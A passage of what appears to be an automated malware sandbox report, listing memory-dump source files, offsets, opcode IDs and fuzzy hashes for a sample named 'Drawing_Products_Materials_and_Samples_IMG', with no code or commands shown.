                                                                                      • Opcode Fuzzy Hash: 23dda4f1fd9234830420151c96e92cbf035a76bec776124ad72110d9539325f9
                                                                                      • Instruction Fuzzy Hash: 0981B374E412298FEB64DF29D850BEDBBB2BF89300F1080EAD409B7255DB705E818F44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 018cd328b8476610aaf49b81b5d6dbc794cd695820197ea9b55fdc0443ae6b31
                                                                                      • Instruction ID: f6bb9ce73b4fb1ee3ce482549553151f652ca2408d68aa64d4ba5d2b4ed4927d
                                                                                      • Opcode Fuzzy Hash: 018cd328b8476610aaf49b81b5d6dbc794cd695820197ea9b55fdc0443ae6b31
                                                                                      • Instruction Fuzzy Hash: 8261C474E012089FEB04DFA9D984BDDBBF6AF89314F14C129E808AB359EA359901CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 141c55b54a2886a9f8590f8e0563204fd5829dedae1a66545b857f7222287d00
                                                                                      • Instruction ID: dac93a219c8ae103f85ff24cc7308ed8b69e200129c7ca5158fdb57a67603634
                                                                                      • Opcode Fuzzy Hash: 141c55b54a2886a9f8590f8e0563204fd5829dedae1a66545b857f7222287d00
                                                                                      • Instruction Fuzzy Hash: 9C518070F002158BEB14DFB9C4A06DEBBB2AFC9740F148529E415BB384DF34AD469B95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1964fb5ee400126a0914c35a3deb880d1be988eecba35cf5689acc51f4dd6e84
                                                                                      • Instruction ID: e922b8ea98b709733ac4b56b04bdd0077583f448d13fdb54ff0702c6798eb5da
                                                                                      • Opcode Fuzzy Hash: 1964fb5ee400126a0914c35a3deb880d1be988eecba35cf5689acc51f4dd6e84
                                                                                      • Instruction Fuzzy Hash: 0F719074E002088FEB54DFA9C990AEDBBF2BF89310F248129D805BB355DB35A942CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1e499db7fcdfb2075a924f5474859cccabe8984949a744404732fa455de754f
                                                                                      • Instruction ID: 39ba222c9fbb5d5bbf6cbf6a992e4d532a8987345e47a79d4da284bd15fec784
                                                                                      • Opcode Fuzzy Hash: f1e499db7fcdfb2075a924f5474859cccabe8984949a744404732fa455de754f
                                                                                      • Instruction Fuzzy Hash: 6071A174E002088FEB54DFA9D990AEDBBF2BF89310F248129D805BB355DB356942CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f61a5c10b7ce38be506240c177f7f561bbeda523da4d0392428075ebb63875ea
                                                                                      • Instruction ID: e18f41281e230ed005b419d3f42c7b42015203ef55bd1ed79643c59747ad1663
                                                                                      • Opcode Fuzzy Hash: f61a5c10b7ce38be506240c177f7f561bbeda523da4d0392428075ebb63875ea
                                                                                      • Instruction Fuzzy Hash: 1771B074E002088FEB54DFA9C990ADDBBF2BF89300F648129D804BB355DB35A942DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfeaf8c35752628f885ce0662f291c78b4ac4d4cbc3c6f8e59d0d9bdde6cd594
                                                                                      • Instruction ID: bcedf69a4a1edc5d7407fffc32bd184fc1f67eb9862f38bd7cfce544dcfdb208
                                                                                      • Opcode Fuzzy Hash: cfeaf8c35752628f885ce0662f291c78b4ac4d4cbc3c6f8e59d0d9bdde6cd594
                                                                                      • Instruction Fuzzy Hash: 7371AF74E00218CFEB54DFA9D990ADDBBB2BF89300F648129D804BB394DB35A942DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77010b986ddc670c3eb1361778c39afbe0e461da0f98a3cf6a2f550180abe06e
                                                                                      • Instruction ID: e1a9b97779c9394dde6773fe0cb9b53951443ddb12faa0efc6bbc2b5a6419b78
                                                                                      • Opcode Fuzzy Hash: 77010b986ddc670c3eb1361778c39afbe0e461da0f98a3cf6a2f550180abe06e
                                                                                      • Instruction Fuzzy Hash: 9451CE317142559FEF198F64D854BAE7BB2FF85704F144429E886CB290CB7ACC82DB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a264315f20e5826cc05ef299e3e95d5456201d795e1ec40ad86cab00b1882a75
                                                                                      • Instruction ID: c5ab2f07742fd7506672ab8bc2a7e33ffc154a6ea38598a8ce3195a22df79679
                                                                                      • Opcode Fuzzy Hash: a264315f20e5826cc05ef299e3e95d5456201d795e1ec40ad86cab00b1882a75
                                                                                      • Instruction Fuzzy Hash: B861B474E012189FDB44DFA9D894AEDBBB2FF88300F10812AE819BB355DB356946DF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      • Instruction ID: 0a8579e572e8023be3f25dc7653a441f8d6961c6c5353b289aad2870cfe20e99
                                                                                      • Opcode Fuzzy Hash: 371640f0311540dd259cf6713cdee2c05fae75c0249c795c6db794adcb1a2e3f
                                                                                      • Instruction Fuzzy Hash: 5C219F357042104BEB2C272988946BE3A9BAFC5725F24C039D506CB3D9EF79CCC2A791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf1f74ce17e6d5ccd2ce6673a7d8cddf4971a8ac4bda711ab62277174c5f64a2
                                                                                      • Instruction ID: 4b83df4d0a85a056ded1e0426aebad47e499a5c45304c7b44122afb849e49d89
                                                                                      • Opcode Fuzzy Hash: cf1f74ce17e6d5ccd2ce6673a7d8cddf4971a8ac4bda711ab62277174c5f64a2
                                                                                      • Instruction Fuzzy Hash: E9218036B045118FD7189B2DD484AAAB7EAAFC8B20B1A407AE405CB371CF71DC41D790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc2bc6fa016d2493aa74605d5fe7a5c3696bf1c7795077196ba47a4a6e18d0a1
                                                                                      • Instruction ID: 55c91dd4be14b082aec8cc29fee1f84913d690f7fc5f2498ba60e1cddde6710b
                                                                                      • Opcode Fuzzy Hash: bc2bc6fa016d2493aa74605d5fe7a5c3696bf1c7795077196ba47a4a6e18d0a1
                                                                                      • Instruction Fuzzy Hash: BF2123357005118BC72C9B69D45496EB792FF8AB657158139E906DB390CF35DC42CBC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f74c3967f59200d776445e86e0e19d1a0f149824e0809e82f0626d1aa9089045
                                                                                      • Instruction ID: 346af19220cf9e0e533e4e92e0af26c68af7d23355de280a7772d9cc9cdb91de
                                                                                      • Opcode Fuzzy Hash: f74c3967f59200d776445e86e0e19d1a0f149824e0809e82f0626d1aa9089045
                                                                                      • Instruction Fuzzy Hash: 09215036B045118FD7189B6DD494A6AB7EAAFC8B10B194079E405CB371DF71DC41C790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0a88bf2ad7956fdae260ad35f446c43746116395db14d4afdfb522f2507e47f
                                                                                      • Instruction ID: 8583f29048a7eb7dcfb3ff692b2f16d303542cbc44b14fdb8f07dd347b010333
                                                                                      • Opcode Fuzzy Hash: e0a88bf2ad7956fdae260ad35f446c43746116395db14d4afdfb522f2507e47f
                                                                                      • Instruction Fuzzy Hash: AE21A435A001189FDF28DB68D440AEE7BA5EB99360F10C029D81ADB250DB35EE47CBD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5205851e1e4416265446a9a0ade25526e944f23a20e6241af97806dd31dbc48
                                                                                      • Instruction ID: 1cbc9f06894962fabae1671f7b78c0433d9af5d814ebb2fb0b2ed2d7d400260a
                                                                                      • Opcode Fuzzy Hash: c5205851e1e4416265446a9a0ade25526e944f23a20e6241af97806dd31dbc48
                                                                                      • Instruction Fuzzy Hash: 3E210375548340EFDF15DF50D9C0B1AFFA5EB84314F24816AE9090B246C336D856EBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc097e1a3e68becb80a011f921ac83907daef05c6eab6b3f47c6410fdcfefe35
                                                                                      • Instruction ID: 75ad3788187de2339026d143b56a8038f3163d1d80ca3a79c57740d0e2accc09
                                                                                      • Opcode Fuzzy Hash: dc097e1a3e68becb80a011f921ac83907daef05c6eab6b3f47c6410fdcfefe35
                                                                                      • Instruction Fuzzy Hash: 28212276244340DFDF14DF10D9C0B2ABFA5FB98324F34866AE9090B246C336D856EBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114412661.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_ad000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce598c5194055272c0282423165dfd091caaaf77c27720c27ee68baa0a90fbb9
                                                                                      • Instruction ID: 4e4a260c40376217825afccffdf1d4fe722185371f8c324215e2c40f29788136
                                                                                      • Opcode Fuzzy Hash: ce598c5194055272c0282423165dfd091caaaf77c27720c27ee68baa0a90fbb9
                                                                                      • Instruction Fuzzy Hash: 2221F575604304EFDB24DF60D9C4F16BBA1EB85314F34C66EE94A4B642C736D846CA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7cb78b3ec0c56ace512cb86fa2fe53b4d02f2d2a68448e6b677ec72c4afe0ba0
                                                                                      • Instruction ID: 55ea9e18b5020a1e3963d6ce6f6edd44e656da1ae0c9a3dda6ab4e4bf1f1f46c
                                                                                      • Opcode Fuzzy Hash: 7cb78b3ec0c56ace512cb86fa2fe53b4d02f2d2a68448e6b677ec72c4afe0ba0
                                                                                      • Instruction Fuzzy Hash: 512112B5D012189FCB50CFA9D4847DEFBF0EB48320F20806AE808AB240D775AA45CBA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f1a5277ee3d57dbb031e52666a65409bf30db438063bae21b8286df665468af
                                                                                      • Instruction ID: f5ab8755454960ddeb68ab03470b5430e562aa5afc0dbde5b7bf7e884f086e91
                                                                                      • Opcode Fuzzy Hash: 9f1a5277ee3d57dbb031e52666a65409bf30db438063bae21b8286df665468af
                                                                                      • Instruction Fuzzy Hash: AD210231744109EFDB089F64E485AEB3BA6FF8A314F004039F8068B255CB38DD96DB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 53e1ed098f78bf6da260d78c2f364080b52bfd967e84fbdbb233c9145999b11d
                                                                                      • Instruction ID: 792843e8e35894c5c470a09e6583cf2169f57a63b0e26ed1ea948ccab853908f
                                                                                      • Opcode Fuzzy Hash: 53e1ed098f78bf6da260d78c2f364080b52bfd967e84fbdbb233c9145999b11d
                                                                                      • Instruction Fuzzy Hash: 0D21B031605245CFCB19CF28C844B997FB1EF45315F4580AAE9599B2A2D731EC81CB52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 950d78e5d43f48b47c657b148ce519324617a157f751ff972a8f920a6157116e
                                                                                      • Instruction ID: 380ecc340f6b01f6d0f5370c1bfcdbc5b084a23e0aee75185429583228b26ada
                                                                                      • Opcode Fuzzy Hash: 950d78e5d43f48b47c657b148ce519324617a157f751ff972a8f920a6157116e
                                                                                      • Instruction Fuzzy Hash: 7E2104B5D012189FCB50CF99D584BDEFBF4EB48320F24806AE808AB240D775AA44CBA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ad78e7cd27097601cb835cb1dd4a6808a8abee140ae762de6873b8c0c7680f8
                                                                                      • Instruction ID: 6e328d212d51759686012d8b664fb29c4668f2cba65eb46fb6ef33607bf248f4
                                                                                      • Opcode Fuzzy Hash: 3ad78e7cd27097601cb835cb1dd4a6808a8abee140ae762de6873b8c0c7680f8
                                                                                      • Instruction Fuzzy Hash: C1216B30E042499FDB09CFA1E550AEEBBB6FF49300F248029F421B6250DB349981DB64
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85e70c7ccc51f9b32e91c3effa966570b4739c54da2180c5dbd892163ba17753
                                                                                      • Instruction ID: bf69cd625b0b0999b7e7131c0664be03fcfc83215803cc3ccf85439d7bcd5afc
                                                                                      • Opcode Fuzzy Hash: 85e70c7ccc51f9b32e91c3effa966570b4739c54da2180c5dbd892163ba17753
                                                                                      • Instruction Fuzzy Hash: F2114F36B14204ABDB18DF65C994ADEBBB6FF8D710F108029E916A7350DB71AD11CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 277490b34669fee9bdd23b6a345b56493b80ea578c2b635523996e30a4614372
                                                                                      • Instruction ID: 5dcb29796548aedc7ec76e41569f14834071b31f4ecdf8525800bbfb922b62b7
                                                                                      • Opcode Fuzzy Hash: 277490b34669fee9bdd23b6a345b56493b80ea578c2b635523996e30a4614372
                                                                                      • Instruction Fuzzy Hash: 85113D74E0921C9FEB04DFA9C984AEDB7F5FB88318F788165E908A7245DB349841CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a173fb76fe236fe8a84659ef151eb7d8c8c7cd0e8e87bf91fc01f342a806284
                                                                                      • Instruction ID: 3e876403b14648909bb60c742a6cbede79171a36d05edb1bb4a683c2968457b9
                                                                                      • Opcode Fuzzy Hash: 1a173fb76fe236fe8a84659ef151eb7d8c8c7cd0e8e87bf91fc01f342a806284
                                                                                      • Instruction Fuzzy Hash: 7811E5357015118BC71D9B2AC85492EB796FF8A7653150078E906DB3A0DF21DC42CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4306ffee4a846c8f01d703b3f546347e8c7a04758e86522a9e4595d8a728179
                                                                                      • Instruction ID: b463246ae6559ce1012d4d8710c5024e3b0a77b3c4a28e10867180d73fd95cfc
                                                                                      • Opcode Fuzzy Hash: e4306ffee4a846c8f01d703b3f546347e8c7a04758e86522a9e4595d8a728179
                                                                                      • Instruction Fuzzy Hash: 75115135E003198BDB18EFB989546EEBBF5EF84250B618139D918A7300DB359C41CBE1
                                                                                      Memory Dump Source
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 310740205c1cec78f40dd2659b6bb3fa2261173b7bf31df553aa8948659b1ec8
                                                                                      • Instruction ID: adb3098fc6c96e5c4540c96bf054b271a53a4b1c4a5540f8d1d44b8c3cbc4238
                                                                                      • Opcode Fuzzy Hash: 310740205c1cec78f40dd2659b6bb3fa2261173b7bf31df553aa8948659b1ec8
                                                                                      • Instruction Fuzzy Hash: E6E08631E102659BCB10E6A5F8048EFBB35AD92311B55462AD45537140E770165AC650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a1aeb089b5c6d4c099dcf26f5bf5f75c5fa24785c7ebc585de14a45fb3760e6
                                                                                      • Instruction ID: 7416067d1d268cca1b368eb068e89fe88fad8f5a786ce195c397039f5b8e0651
                                                                                      • Opcode Fuzzy Hash: 3a1aeb089b5c6d4c099dcf26f5bf5f75c5fa24785c7ebc585de14a45fb3760e6
                                                                                      • Instruction Fuzzy Hash: 9CD05B31D2022A97CB10E7A5EC048DFFB38EED5321B904626D92437140FB702659C6E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d5dde8ded2d4bf323c0dbad90d8323a27b3d78d6150e2f59df629114814ff40
                                                                                      • Instruction ID: 31a4d9881e4cd29cbcbc8958714926c4e2bbbc9abaf4dd1c825dd8ded61f291c
                                                                                      • Opcode Fuzzy Hash: 2d5dde8ded2d4bf323c0dbad90d8323a27b3d78d6150e2f59df629114814ff40
                                                                                      • Instruction Fuzzy Hash: F9D02E7B781A2343831E199DB0101B8AB4BDEC83A239A413AEA4CC3305CF21CC078190
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                      • Instruction ID: 0a9b6f39fa8f99fb8477a6418c02cff63a0da83091ac3558a73211a550e730d5
                                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                      • Instruction Fuzzy Hash: 7AC0123720C1282AA228208F7C44AE3BA8CD2C13B5B220237F52C872409842AC8001B5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02249cd8ac2d5cdad095abd3f9022425dc559a65d4197654dae608225edb7801
                                                                                      • Instruction ID: 850cd73dbbf1009809092daf96f837ad2ba1f71f998c840f89f12da50f0e251a
                                                                                      • Opcode Fuzzy Hash: 02249cd8ac2d5cdad095abd3f9022425dc559a65d4197654dae608225edb7801
                                                                                      • Instruction Fuzzy Hash: AFD09E36B041146B4B152A59A4048AE7F6AEFCA7617058026F91996600CE714912A795
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4de2a2564592040feac61bcec26b6d3b58f09c0c0260f7573e339cda11a03bb2
                                                                                      • Instruction ID: 34bc4ae4e8b8258104d299171803af8a99dae82fe1df8a8214ae0a2057e9f3ad
                                                                                      • Opcode Fuzzy Hash: 4de2a2564592040feac61bcec26b6d3b58f09c0c0260f7573e339cda11a03bb2
                                                                                      • Instruction Fuzzy Hash: 46D05E37A04108AEDF009E80F814AEE3364EB84721F108022F61495440C7325521AB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a26a5bc45ab9c0f75367bff9f51d8d1d3cc94d04ddaa36bc229befdea033c6a
                                                                                      • Instruction ID: e11092119b2f8bf4db8f6354f8570d864d8c2254f401b3fd10ada471115ae7dc
                                                                                      • Opcode Fuzzy Hash: 0a26a5bc45ab9c0f75367bff9f51d8d1d3cc94d04ddaa36bc229befdea033c6a
                                                                                      • Instruction Fuzzy Hash: C2D0C736B001146B4B052A49A4048AE7F5EFFC97717048026F90597300CE714D1297D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c5e70f7080598c0ea89309607213b9b71c24d089d56b29176880d4141aa9da4
                                                                                      • Instruction ID: 546113375edbcec6f571922cccd8e2b81a72235fdac4649e8f9742a77f56684a
                                                                                      • Opcode Fuzzy Hash: 2c5e70f7080598c0ea89309607213b9b71c24d089d56b29176880d4141aa9da4
                                                                                      • Instruction Fuzzy Hash: CAD0673BB500099BDB049F98E8509DDF776FB98221B148116F915A3260C6319921DB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
